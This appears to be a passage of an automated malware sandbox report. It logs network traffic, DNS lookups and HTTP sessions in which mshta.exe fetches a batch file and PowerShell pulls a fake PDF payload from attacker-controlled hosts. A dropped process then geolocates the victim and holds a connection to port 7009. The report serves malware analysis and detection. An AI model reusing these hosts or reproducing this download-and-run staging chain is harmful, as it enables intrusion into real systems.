                                                                  Jan 7, 2025 18:13:04.866353989 CET49738443192.168.2.4193.26.115.39
                                                                  Jan 7, 2025 18:13:04.866481066 CET44349738193.26.115.39192.168.2.4
                                                                  Jan 7, 2025 18:13:04.866497040 CET44349738193.26.115.39192.168.2.4
                                                                  Jan 7, 2025 18:13:04.866625071 CET49738443192.168.2.4193.26.115.39
                                                                  Jan 7, 2025 18:13:04.866630077 CET44349738193.26.115.39192.168.2.4
                                                                  Jan 7, 2025 18:13:04.866702080 CET49738443192.168.2.4193.26.115.39
                                                                  Jan 7, 2025 18:13:04.918411016 CET44349738193.26.115.39192.168.2.4
                                                                  Jan 7, 2025 18:13:04.918431044 CET44349738193.26.115.39192.168.2.4
                                                                  Jan 7, 2025 18:13:04.918482065 CET49738443192.168.2.4193.26.115.39
                                                                  Jan 7, 2025 18:13:04.918488979 CET44349738193.26.115.39192.168.2.4
                                                                  Jan 7, 2025 18:13:04.918525934 CET49738443192.168.2.4193.26.115.39
                                                                  Jan 7, 2025 18:13:04.918538094 CET49738443192.168.2.4193.26.115.39
                                                                  Jan 7, 2025 18:13:04.951124907 CET44349738193.26.115.39192.168.2.4
                                                                  Jan 7, 2025 18:13:04.951143026 CET44349738193.26.115.39192.168.2.4
                                                                  Jan 7, 2025 18:13:04.951205969 CET49738443192.168.2.4193.26.115.39
                                                                  Jan 7, 2025 18:13:05.155345917 CET44349738193.26.115.39192.168.2.4
                                                                  Jan 7, 2025 18:13:05.243947983 CET49738443192.168.2.4193.26.115.39
                                                                  Jan 7, 2025 18:13:05.459333897 CET44349738193.26.115.39192.168.2.4
                                                                  Jan 7, 2025 18:13:05.459410906 CET49738443192.168.2.4193.26.115.39
                                                                  Jan 7, 2025 18:13:05.887339115 CET44349738193.26.115.39192.168.2.4
                                                                  Jan 7, 2025 18:13:05.887453079 CET49738443192.168.2.4193.26.115.39
                                                                  Jan 7, 2025 18:13:06.751332998 CET44349738193.26.115.39192.168.2.4
                                                                  Jan 7, 2025 18:13:06.751399040 CET49738443192.168.2.4193.26.115.39
                                                                  Jan 7, 2025 18:13:07.103913069 CET49738443192.168.2.4193.26.115.39
                                                                  Jan 7, 2025 18:13:07.103923082 CET44349738193.26.115.39192.168.2.4
                                                                  Jan 7, 2025 18:13:07.103933096 CET44349738193.26.115.39192.168.2.4
                                                                  Jan 7, 2025 18:13:07.103974104 CET44349738193.26.115.39192.168.2.4
                                                                  Jan 7, 2025 18:13:07.103981018 CET49738443192.168.2.4193.26.115.39
                                                                  Jan 7, 2025 18:13:07.103991985 CET44349738193.26.115.39192.168.2.4
                                                                  Jan 7, 2025 18:13:07.104001045 CET44349738193.26.115.39192.168.2.4
                                                                  Jan 7, 2025 18:13:07.104021072 CET49738443192.168.2.4193.26.115.39
                                                                  Jan 7, 2025 18:13:07.104026079 CET44349738193.26.115.39192.168.2.4
                                                                  Jan 7, 2025 18:13:07.104041100 CET44349738193.26.115.39192.168.2.4
                                                                  Jan 7, 2025 18:13:07.104052067 CET44349738193.26.115.39192.168.2.4
                                                                  Jan 7, 2025 18:13:07.104062080 CET49738443192.168.2.4193.26.115.39
                                                                  Jan 7, 2025 18:13:07.104072094 CET44349738193.26.115.39192.168.2.4
                                                                  Jan 7, 2025 18:13:07.104080915 CET44349738193.26.115.39192.168.2.4
                                                                  Jan 7, 2025 18:13:07.104089975 CET44349738193.26.115.39192.168.2.4
                                                                  Jan 7, 2025 18:13:07.104101896 CET49738443192.168.2.4193.26.115.39
                                                                  Jan 7, 2025 18:13:07.104101896 CET49738443192.168.2.4193.26.115.39
                                                                  Jan 7, 2025 18:13:07.104115009 CET44349738193.26.115.39192.168.2.4
                                                                  Jan 7, 2025 18:13:07.104123116 CET44349738193.26.115.39192.168.2.4
                                                                  Jan 7, 2025 18:13:07.104131937 CET44349738193.26.115.39192.168.2.4
                                                                  Jan 7, 2025 18:13:07.104151964 CET49738443192.168.2.4193.26.115.39
                                                                  Jan 7, 2025 18:13:07.104156971 CET44349738193.26.115.39192.168.2.4
                                                                  Jan 7, 2025 18:13:07.104165077 CET44349738193.26.115.39192.168.2.4
                                                                  Jan 7, 2025 18:13:07.104192972 CET49738443192.168.2.4193.26.115.39
                                                                  Jan 7, 2025 18:13:07.104206085 CET44349738193.26.115.39192.168.2.4
                                                                  Jan 7, 2025 18:13:07.104216099 CET44349738193.26.115.39192.168.2.4
                                                                  Jan 7, 2025 18:13:07.104234934 CET44349738193.26.115.39192.168.2.4
                                                                  Jan 7, 2025 18:13:07.104240894 CET49738443192.168.2.4193.26.115.39
                                                                  Jan 7, 2025 18:13:07.104274988 CET44349738193.26.115.39192.168.2.4
                                                                  Jan 7, 2025 18:13:07.104285002 CET44349738193.26.115.39192.168.2.4
                                                                  Jan 7, 2025 18:13:07.104305983 CET49738443192.168.2.4193.26.115.39
                                                                  Jan 7, 2025 18:13:07.104311943 CET44349738193.26.115.39192.168.2.4
                                                                  Jan 7, 2025 18:13:07.104325056 CET44349738193.26.115.39192.168.2.4
                                                                  Jan 7, 2025 18:13:07.104347944 CET44349738193.26.115.39192.168.2.4
                                                                  Jan 7, 2025 18:13:07.104355097 CET49738443192.168.2.4193.26.115.39
                                                                  Jan 7, 2025 18:13:07.104363918 CET44349738193.26.115.39192.168.2.4
                                                                  Jan 7, 2025 18:13:07.104386091 CET49738443192.168.2.4193.26.115.39
                                                                  Jan 7, 2025 18:13:07.104393959 CET44349738193.26.115.39192.168.2.4
                                                                  Jan 7, 2025 18:13:07.104437113 CET49738443192.168.2.4193.26.115.39
                                                                  Jan 7, 2025 18:13:07.104460955 CET49738443192.168.2.4193.26.115.39
                                                                  Jan 7, 2025 18:13:07.315330982 CET44349738193.26.115.39192.168.2.4
                                                                  Jan 7, 2025 18:13:07.315392017 CET49738443192.168.2.4193.26.115.39
                                                                  Jan 7, 2025 18:13:07.523333073 CET44349738193.26.115.39192.168.2.4
                                                                  Jan 7, 2025 18:13:07.523387909 CET49738443192.168.2.4193.26.115.39
                                                                  Jan 7, 2025 18:13:07.659578085 CET49738443192.168.2.4193.26.115.39
                                                                  Jan 7, 2025 18:13:07.659590960 CET44349738193.26.115.39192.168.2.4
                                                                  Jan 7, 2025 18:13:07.659672976 CET49738443192.168.2.4193.26.115.39
                                                                  Jan 7, 2025 18:13:07.673142910 CET49738443192.168.2.4193.26.115.39
                                                                  Jan 7, 2025 18:13:07.673147917 CET44349738193.26.115.39192.168.2.4
                                                                  Jan 7, 2025 18:13:07.673165083 CET44349738193.26.115.39192.168.2.4
                                                                  Jan 7, 2025 18:13:07.673182964 CET44349738193.26.115.39192.168.2.4
                                                                  Jan 7, 2025 18:13:07.673345089 CET49738443192.168.2.4193.26.115.39
                                                                  Jan 7, 2025 18:13:07.673352957 CET44349738193.26.115.39192.168.2.4
                                                                  Jan 7, 2025 18:13:07.673362017 CET44349738193.26.115.39192.168.2.4
                                                                  Jan 7, 2025 18:13:07.673378944 CET44349738193.26.115.39192.168.2.4
                                                                  Jan 7, 2025 18:13:07.673404932 CET44349738193.26.115.39192.168.2.4
                                                                  Jan 7, 2025 18:13:07.673418045 CET49738443192.168.2.4193.26.115.39
                                                                  Jan 7, 2025 18:13:07.673481941 CET49738443192.168.2.4193.26.115.39
                                                                  Jan 7, 2025 18:13:07.673588991 CET49738443192.168.2.4193.26.115.39
                                                                  Jan 7, 2025 18:13:07.870667934 CET49738443192.168.2.4193.26.115.39
                                                                  Jan 7, 2025 18:13:07.870683908 CET44349738193.26.115.39192.168.2.4
                                                                  Jan 7, 2025 18:13:07.870764971 CET49738443192.168.2.4193.26.115.39
                                                                  Jan 7, 2025 18:13:07.885957003 CET49738443192.168.2.4193.26.115.39
                                                                  Jan 7, 2025 18:13:07.885961056 CET44349738193.26.115.39192.168.2.4
                                                                  Jan 7, 2025 18:13:07.885978937 CET44349738193.26.115.39192.168.2.4
                                                                  Jan 7, 2025 18:13:07.885997057 CET44349738193.26.115.39192.168.2.4
                                                                  Jan 7, 2025 18:13:07.886007071 CET44349738193.26.115.39192.168.2.4
                                                                  Jan 7, 2025 18:13:07.886168003 CET49738443192.168.2.4193.26.115.39
                                                                  Jan 7, 2025 18:13:07.886254072 CET49738443192.168.2.4193.26.115.39
                                                                  Jan 7, 2025 18:13:08.274175882 CET49738443192.168.2.4193.26.115.39
                                                                  Jan 7, 2025 18:13:08.281905890 CET49738443192.168.2.4193.26.115.39
                                                                  Jan 7, 2025 18:13:08.536396980 CET49738443192.168.2.4193.26.115.39
                                                                  Jan 7, 2025 18:13:54.676255941 CET497567009192.168.2.4193.26.115.39
                                                                  Jan 7, 2025 18:13:54.681060076 CET700949756193.26.115.39192.168.2.4
                                                                  Jan 7, 2025 18:13:54.682718992 CET497567009192.168.2.4193.26.115.39
                                                                  Jan 7, 2025 18:13:54.687796116 CET497567009192.168.2.4193.26.115.39
                                                                  Jan 7, 2025 18:13:54.692553997 CET700949756193.26.115.39192.168.2.4
                                                                  Jan 7, 2025 18:13:55.257489920 CET700949756193.26.115.39192.168.2.4
                                                                  Jan 7, 2025 18:13:55.311475039 CET497567009192.168.2.4193.26.115.39
                                                                  Jan 7, 2025 18:13:55.394946098 CET700949756193.26.115.39192.168.2.4
                                                                  Jan 7, 2025 18:13:55.399101973 CET497567009192.168.2.4193.26.115.39
                                                                  Jan 7, 2025 18:13:55.403860092 CET700949756193.26.115.39192.168.2.4
                                                                  Jan 7, 2025 18:13:55.403929949 CET497567009192.168.2.4193.26.115.39
                                                                  Jan 7, 2025 18:13:55.408725977 CET700949756193.26.115.39192.168.2.4
                                                                  Jan 7, 2025 18:13:55.629553080 CET700949756193.26.115.39192.168.2.4
                                                                  Jan 7, 2025 18:13:55.630891085 CET497567009192.168.2.4193.26.115.39
                                                                  Jan 7, 2025 18:13:55.635737896 CET700949756193.26.115.39192.168.2.4
                                                                  Jan 7, 2025 18:13:55.727293015 CET700949756193.26.115.39192.168.2.4
                                                                  Jan 7, 2025 18:13:55.775119066 CET4975880192.168.2.4178.237.33.50
                                                                  Jan 7, 2025 18:13:55.779930115 CET8049758178.237.33.50192.168.2.4
                                                                  Jan 7, 2025 18:13:55.780205011 CET497567009192.168.2.4193.26.115.39
                                                                  Jan 7, 2025 18:13:55.780242920 CET4975880192.168.2.4178.237.33.50
                                                                  Jan 7, 2025 18:13:55.780370951 CET4975880192.168.2.4178.237.33.50
                                                                  Jan 7, 2025 18:13:55.785161018 CET8049758178.237.33.50192.168.2.4
                                                                  Jan 7, 2025 18:13:56.429481030 CET8049758178.237.33.50192.168.2.4
                                                                  Jan 7, 2025 18:13:56.432073116 CET4975880192.168.2.4178.237.33.50
                                                                  Jan 7, 2025 18:13:56.442120075 CET497567009192.168.2.4193.26.115.39
                                                                  Jan 7, 2025 18:13:56.446989059 CET700949756193.26.115.39192.168.2.4
                                                                  Jan 7, 2025 18:13:57.429505110 CET8049758178.237.33.50192.168.2.4
                                                                  Jan 7, 2025 18:13:57.429683924 CET4975880192.168.2.4178.237.33.50
                                                                  Jan 7, 2025 18:14:11.647881031 CET700949756193.26.115.39192.168.2.4
                                                                  Jan 7, 2025 18:14:11.649019957 CET497567009192.168.2.4193.26.115.39
                                                                  Jan 7, 2025 18:14:11.653835058 CET700949756193.26.115.39192.168.2.4
                                                                  Jan 7, 2025 18:14:41.662075043 CET700949756193.26.115.39192.168.2.4
                                                                  Jan 7, 2025 18:14:41.665317059 CET497567009192.168.2.4193.26.115.39
                                                                  Jan 7, 2025 18:14:41.670162916 CET700949756193.26.115.39192.168.2.4

                                                                  UDP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Jan 7, 2025 18:12:56.079799891 CET5310253192.168.2.41.1.1.1
                                                                  Jan 7, 2025 18:12:56.087198973 CET53531021.1.1.1192.168.2.4
                                                                  Jan 7, 2025 18:12:59.651398897 CET5370953192.168.2.41.1.1.1
                                                                  Jan 7, 2025 18:12:59.667505980 CET53537091.1.1.1192.168.2.4
                                                                  Jan 7, 2025 18:13:14.963872910 CET6094353192.168.2.41.1.1.1
                                                                  Jan 7, 2025 18:13:23.263462067 CET5154653192.168.2.41.1.1.1
                                                                  Jan 7, 2025 18:13:23.282586098 CET53515461.1.1.1192.168.2.4
                                                                  Jan 7, 2025 18:13:43.266180992 CET5206753192.168.2.41.1.1.1
                                                                  Jan 7, 2025 18:13:43.286603928 CET53520671.1.1.1192.168.2.4
                                                                  Jan 7, 2025 18:13:54.639218092 CET5871953192.168.2.41.1.1.1
                                                                  Jan 7, 2025 18:13:54.673007011 CET53587191.1.1.1192.168.2.4
                                                                  Jan 7, 2025 18:13:55.761528969 CET6167053192.168.2.41.1.1.1
                                                                  Jan 7, 2025 18:13:55.769001007 CET53616701.1.1.1192.168.2.4
                                                                  Jan 7, 2025 18:14:19.406017065 CET5680553192.168.2.41.1.1.1
                                                                  Jan 7, 2025 18:14:19.414688110 CET53568051.1.1.1192.168.2.4
                                                                  Jan 7, 2025 18:14:43.530844927 CET5527153192.168.2.41.1.1.1
                                                                  Jan 7, 2025 18:14:43.541599035 CET53552711.1.1.1192.168.2.4

                                                                  DNS Queries

                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                  Jan 7, 2025 18:12:56.079799891 CET192.168.2.41.1.1.10x7b8fStandard query (0)files.catbox.moeA (IP address)IN (0x0001)false
                                                                  Jan 7, 2025 18:12:59.651398897 CET192.168.2.41.1.1.10xc58bStandard query (0)myguyapp.comA (IP address)IN (0x0001)false
                                                                  Jan 7, 2025 18:13:14.963872910 CET192.168.2.41.1.1.10x6907Standard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false
                                                                  Jan 7, 2025 18:13:23.263462067 CET192.168.2.41.1.1.10x5b82Standard query (0)ecIUYmCipwWZXGGOIZYONyVhLKgCF.ecIUYmCipwWZXGGOIZYONyVhLKgCFA (IP address)IN (0x0001)false
                                                                  Jan 7, 2025 18:13:43.266180992 CET192.168.2.41.1.1.10x8d7Standard query (0)ecIUYmCipwWZXGGOIZYONyVhLKgCF.ecIUYmCipwWZXGGOIZYONyVhLKgCFA (IP address)IN (0x0001)false
                                                                  Jan 7, 2025 18:13:54.639218092 CET192.168.2.41.1.1.10xb1b6Standard query (0)me-work.comA (IP address)IN (0x0001)false
                                                                  Jan 7, 2025 18:13:55.761528969 CET192.168.2.41.1.1.10xb198Standard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                                                  Jan 7, 2025 18:14:19.406017065 CET192.168.2.41.1.1.10x89b8Standard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                                                  Jan 7, 2025 18:14:43.530844927 CET192.168.2.41.1.1.10x4007Standard query (0)geoplugin.netA (IP address)IN (0x0001)false

                                                                  DNS Answers

                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                  Jan 7, 2025 18:12:56.087198973 CET1.1.1.1192.168.2.40x7b8fNo error (0)files.catbox.moe108.181.20.35A (IP address)IN (0x0001)false
                                                                  Jan 7, 2025 18:12:59.667505980 CET1.1.1.1192.168.2.40xc58bNo error (0)myguyapp.com193.26.115.39A (IP address)IN (0x0001)false
                                                                  Jan 7, 2025 18:13:14.580420971 CET1.1.1.1192.168.2.40xaadfNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                  Jan 7, 2025 18:13:14.580420971 CET1.1.1.1192.168.2.40xaadfNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                  Jan 7, 2025 18:13:14.971046925 CET1.1.1.1192.168.2.40x6907No error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                  Jan 7, 2025 18:13:23.282586098 CET1.1.1.1192.168.2.40x5b82Name error (3)ecIUYmCipwWZXGGOIZYONyVhLKgCF.ecIUYmCipwWZXGGOIZYONyVhLKgCFnonenoneA (IP address)IN (0x0001)false
                                                                  Jan 7, 2025 18:13:43.286603928 CET1.1.1.1192.168.2.40x8d7Name error (3)ecIUYmCipwWZXGGOIZYONyVhLKgCF.ecIUYmCipwWZXGGOIZYONyVhLKgCFnonenoneA (IP address)IN (0x0001)false
                                                                  Jan 7, 2025 18:13:54.673007011 CET1.1.1.1192.168.2.40xb1b6No error (0)me-work.com193.26.115.39A (IP address)IN (0x0001)false
                                                                  Jan 7, 2025 18:13:55.769001007 CET1.1.1.1192.168.2.40xb198No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                                  Jan 7, 2025 18:14:19.414688110 CET1.1.1.1192.168.2.40x89b8No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                                  Jan 7, 2025 18:14:43.541599035 CET1.1.1.1192.168.2.40x4007No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false

                                                                  HTTP Request Dependency Graph

                                                                  • files.catbox.moe
                                                                  • myguyapp.com
                                                                  • geoplugin.net

                                                                  HTTP Packets

                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  0192.168.2.449758178.237.33.50805752C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com
                                                                  TimestampBytes transferredDirectionData
                                                                  Jan 7, 2025 18:13:55.780370951 CET71OUTGET /json.gp HTTP/1.1
                                                                  Host: geoplugin.net
                                                                  Cache-Control: no-cache
                                                                  Jan 7, 2025 18:13:56.429481030 CET1171INHTTP/1.1 200 OK
                                                                  date: Tue, 07 Jan 2025 17:13:56 GMT
                                                                  server: Apache
                                                                  content-length: 963
                                                                  content-type: application/json; charset=utf-8
                                                                  cache-control: public, max-age=300
                                                                  access-control-allow-origin: *
                                                                  Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 [TRUNCATED]
                                                                  Data Ascii: { "geoplugin_request":"8.46.123.189", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                  HTTPS Proxied Packets

                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  0192.168.2.449731108.181.20.354436164C:\Windows\SysWOW64\mshta.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-07 17:12:57 UTC310OUTGET /0o8vth.bat HTTP/1.1
                                                                  Accept: */*
                                                                  Accept-Language: en-CH
                                                                  Accept-Encoding: gzip, deflate
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                  Host: files.catbox.moe
                                                                  Connection: Keep-Alive
                                                                  2025-01-07 17:12:57 UTC548INHTTP/1.1 200 OK
                                                                  Server: nginx
                                                                  Date: Tue, 07 Jan 2025 17:12:57 GMT
                                                                  Content-Type: application/octet-stream
                                                                  Content-Length: 5541
                                                                  Last-Modified: Tue, 07 Jan 2025 14:55:14 GMT
                                                                  Connection: close
                                                                  ETag: "677d4052-15a5"
                                                                  X-Content-Type-Options: nosniff
                                                                  Content-Security-Policy: default-src 'self' https://files.catbox.moe; style-src https://files.catbox.moe 'unsafe-inline'; img-src 'self' data:; font-src 'self'; media-src 'self'; object-src 'self';
                                                                  Access-Control-Allow-Origin: *
                                                                  Access-Control-Allow-Methods: GET, HEAD
                                                                  Accept-Ranges: bytes
                                                                  2025-01-07 17:12:57 UTC5541INData Raw: 3a 3a 20 e2 96 84 e2 96 84 e2 96 84 e2 96 84 20 20 20 20 e2 96 84 e2 96 84 e2 96 84 20 20 20 20 20 e2 96 84 e2 96 84 e2 96 84 e2 96 88 e2 96 88 e2 96 88 e2 96 88 e2 96 88 e2 96 93 20 e2 96 84 e2 96 88 e2 96 88 e2 96 88 e2 96 88 e2 96 84 20 20 20 e2 96 88 e2 96 88 e2 96 91 20 e2 96 88 e2 96 88 20 20 20 e2 96 88 e2 96 88 e2 96 88 e2 96 88 e2 96 88 e2 96 88 20 20 e2 96 88 e2 96 88 e2 96 91 20 e2 96 88 e2 96 88 20 20 e2 96 88 e2 96 88 e2 96 93 e2 96 93 e2 96 88 e2 96 88 e2 96 88 e2 96 88 e2 96 88 20 20 e2 96 88 e2 96 88 e2 96 93 20 20 20 20 e2 96 93 e2 96 88 e2 96 88 e2 96 88 e2 96 88 e2 96 88 e2 96 84 20 0d 0a 3a 3a 20 e2 96 93 e2 96 88 e2 96 88 e2 96 88 e2 96 88 e2 96 88 e2 96 84 20 e2 96 92 e2 96 88 e2 96 88 e2 96 88 e2 96 88 e2 96 84 20 20 20 e2 96 93 20
                                                                  Data Ascii: :: ::


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  1192.168.2.449735193.26.115.394437196C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-07 17:13:00 UTC163OUTGET /W2.pdf HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                  Host: myguyapp.com
                                                                  Connection: Keep-Alive
                                                                  2025-01-07 17:13:00 UTC283INHTTP/1.1 200 OK
                                                                  Date: Tue, 07 Jan 2025 17:13:00 GMT
                                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                  Last-Modified: Sun, 15 Dec 2024 22:53:19 GMT
                                                                  ETag: "602ec-62956ee20a194"
                                                                  Accept-Ranges: bytes
                                                                  Content-Length: 393964
                                                                  Connection: close
                                                                  Content-Type: application/pdf
                                                                  2025-01-07 17:13:00 UTC7909INData Raw: 25 50 44 46 2d 31 2e 34 0d 25 e2 e3 cf d3 0d 0a 34 20 30 20 6f 62 6a 0d 3c 3c 2f 4c 69 6e 65 61 72 69 7a 65 64 20 31 2f 4c 20 33 39 33 39 36 34 2f 4f 20 36 2f 45 20 33 36 32 36 31 37 2f 4e 20 31 2f 54 20 33 39 33 37 37 30 2f 48 20 5b 20 31 33 31 36 20 32 33 38 5d 3e 3e 0d 65 6e 64 6f 62 6a 0d 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0d 78 72 65 66 0d 0a 34 20 35 31 0d 0a 30 30 30 30 30 30 30 30 31 36 20 30 30 30 30 30 20 6e 0d 0a 30 30 30 30 30 30 31 35 35 34 20 30 30 30 30 30 20 6e 0d 0a 30 30 30 30 30 30 31 36 31 34 20 30 30 30 30 30 20 6e 0d 0a 30 30 30 30 30 30 32 32 34 32 20 30 30 30 30 30 20 6e 0d 0a 30 30 30 30 30 30 32 34 30 37 20 30 30 30 30 30 20 6e 0d 0a 30 30 30 30 30 30 32 39 31 35 20 30 30 30 30 30 20 6e 0d 0a 30 30 30 30 30 30 33
                                                                  Data Ascii: %PDF-1.4%4 0 obj<</Linearized 1/L 393964/O 6/E 362617/N 1/T 393770/H [ 1316 238]>>endobj xref4 510000000016 00000 n0000001554 00000 n0000001614 00000 n0000002242 00000 n0000002407 00000 n0000002915 00000 n0000003
                                                                  2025-01-07 17:13:00 UTC16384INData Raw: 46 51 a8 bb 7a fa 70 70 78 98 2b 02 a5 c0 85 82 87 69 86 e6 3d 94 a5 ea 7d 6a 0c 0c ff a8 e4 34 9d 13 c9 3d fd be a1 91 30 ec b7 c2 23 c4 c6 5e 53 64 fa 4e 9f 37 f6 59 2e c5 c1 4b c5 fd 71 03 6c 3d 78 ba 77 4c 99 1a 5d 31 93 65 1f 8a 27 6b 12 7a 94 a4 4a 4c ca a7 8b 06 43 ba d8 08 72 c4 09 99 52 33 a7 04 a9 f3 a0 8b 82 34 94 ee ed 27 13 e1 8a 96 b4 cb 8c 41 6e c6 1f 95 49 00 46 0d 95 fc f1 d0 92 df dc 9d cc 5d 72 7d b1 75 e1 7c 1a ad 52 15 71 d8 48 f1 68 76 d3 17 c3 94 10 6a 02 6b ee c1 26 dc fc 13 0f 0b 6a 6c 1b cc 55 53 13 1a 0b 2d dd 44 d0 a4 90 a0 47 f3 bd c9 0c 9b 06 c1 89 86 4c e9 82 87 31 68 48 ed c6 3c 81 1d 63 29 28 d4 b0 2e a1 55 84 da 7b cb eb c8 68 aa bc 36 69 32 55 90 fb 7c 7a 45 7c 3c db 7e 07 07 c5 2d 3b db 1c 33 39 4d 22 b8 81 49 25 bb 72
                                                                  Data Ascii: FQzppx+i=}j4=0#^SdN7Y.Kql=xwL]1e'kzJLCrR34'AnIF]r}u|RqHhvjk&jlUS-DGL1hH<c)(.U{h6i2U|zE|<~-;39M"I%r
                                                                  2025-01-07 17:13:00 UTC16384INData Raw: 1a 72 64 20 53 fd af c8 24 18 17 3c 29 e3 fc 1f 48 13 f3 1c 96 6f b3 01 5f 58 5b da ea b7 2f 53 8d a1 e8 fe f2 ea a4 16 7b 01 9c 03 8d 4a b0 5e 1a f9 86 c5 8e 5e ec 81 61 d6 97 23 ec 1b f5 ad 04 26 ca 94 60 b1 1d e7 a3 56 a4 54 d7 0c fa 69 d9 df 47 4c 53 58 2f f5 47 f1 6f b5 f6 2d 5d 3b bb 7e ba a6 0b a4 d9 df 81 8d bf 7f 99 1d eb 03 09 74 ed fc 43 c0 f7 87 d1 30 d7 ed d3 b9 ee 6c 35 fb 7f 96 61 3a 5f 3b 47 34 15 df 74 19 fe 7e ec df 40 bc 88 d7 c7 b6 8d 16 c9 c4 68 07 ec 61 4d ee 20 fe 6f 95 3e e1 79 d2 27 ba 54 a6 07 ab 98 f3 4d 50 49 fd 2b e8 d8 b5 52 05 03 33 63 cc df 33 bf 97 2a 08 15 ef 6a a9 f2 17 73 b6 e6 4b 90 79 4e ee f4 f6 43 8b fc 06 9e 87 67 e0 90 92 39 46 1f 08 56 48 1d d4 c2 15 8a d7 92 e9 cf f3 fd b0 d4 fd af 8c ff 53 37 52 9e b2 b8 77 c0
                                                                  Data Ascii: rd S$<)Ho_X[/S{J^^a#&`VTiGLSX/Go-];~tC0l5a:_;G4t~@haM o>y'TMPI+R3c3*jsKyNCg9FVHS7Rw
                                                                  2025-01-07 17:13:00 UTC16384INData Raw: 5e a2 6a 24 f5 91 8e b7 27 79 c8 7d ea d2 b1 25 7c ee 57 ec c9 15 dd a9 30 15 b5 d3 34 83 a2 76 8e 63 1f 59 1c bc f9 10 30 d0 d4 ba c9 24 3c 8f ac cc f2 6a 0c 1e 08 8d 60 af da 3a 1c 24 37 86 f0 4d 5c 80 63 e7 b3 eb cf 66 37 32 89 f1 7e 7a cd fd 2b 50 21 8c e0 18 ec eb 30 53 f0 8c d4 d6 26 66 50 84 eb c7 8d fc 42 b9 97 de 25 ec 90 3e a2 46 e9 0b fc 65 e1 82 74 59 96 57 f3 3f 12 7e 28 ad 95 bb f8 6e a1 4b ea 96 77 f0 bb 64 89 7c 96 6a a2 37 a1 9f b0 74 4b c4 1d 81 36 63 aa 71 35 b3 1b ef 66 38 91 c1 b4 4c d1 2c a7 b0 88 13 24 99 e6 25 2b 1c 83 67 b9 43 02 cd 8c 4a 94 38 2a 23 7c 48 d1 2c a4 e6 da 52 75 ea 50 8f 1c cd 63 9e 0d 92 21 a9 90 c2 42 6d 78 0e 2a a4 28 32 db ab c6 e0 81 eb 4a 8b 92 28 48 23 f8 17 29 87 1d 62 0c cf 31 2c f9 20 c7 8b 82 28 09 e4 bd
